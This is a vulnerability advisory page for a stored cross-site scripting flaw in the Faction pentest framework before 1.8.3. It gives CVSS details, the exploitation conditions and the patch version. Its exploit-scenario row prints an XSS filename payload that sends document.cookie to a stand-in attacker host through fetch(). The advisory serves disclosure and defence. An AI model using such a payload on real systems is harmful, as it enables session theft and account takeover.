EUVD-2026-31942Severity by source
AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
FACTION is a PenTesting Report Generation and Collaboration Framework. Prior to 1.8.3, Faction is vulnerable to stored cross-site scripting (XSS) via attachment filenames in remediation verification file preview flows. User-supplied filename values are persisted and then rendered into HTML and attribute contexts without output encoding, allowing attacker-controlled JavaScript to execute in the browser of any user who opens the affected verification/remediation views. Because the payload is stored server-side and rendered to other users, exploitation is persistent and can impact privileged accounts. This vulnerability is fixed in 1.8.3.
AnalysisAI
Stored cross-site scripting in Faction penetration testing platform versions prior to 1.8.3 allows authenticated users to inject JavaScript via crafted attachment filenames in remediation verification flows, which then executes in the browser of any user viewing the affected verification or remediation views. With CVSS scope-changed impact (S:C) and high confidentiality and integrity impact, exploitation can hijack privileged manager or assessor sessions; no public exploit identified at time of analysis and EPSS sits at 0.03% (10th percentile).
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Attacker must hold a Faction account with permission to upload attachments to remediation verification flows (CVSS PR:L) and must wait for a separate, higher-privileged user to open the verification or remediation file-preview view that renders the malicious filename (CVSS UI:R). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N) scores 8.7 because the scope change reflects the cross-user impact - a low-privileged uploader can compromise higher-privileged viewers. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with low-privileged assessor access uploads an attachment whose filename contains a payload such as `"><img src=x onerror=fetch('https://atk/'+document.cookie)>` to a remediation verification flow. When a manager later opens the verification view to validate the fix, the stored filename is rendered without encoding and the JavaScript executes in the manager's authenticated session, allowing the attacker to exfiltrate session tokens, read finalized client reports, or pivot to admin actions. … |
| Remediation | Vendor-released patch: upgrade to Faction 1.8.3 or later, available at https://github.com/factionsecurity/faction/releases/tag/1.8.3 (advisory GHSA-x3fm-rrxj-rg66). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Inventory all Faction deployments and confirm versions in production. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Share
External POC / Exploit Code
Leaving vuln.today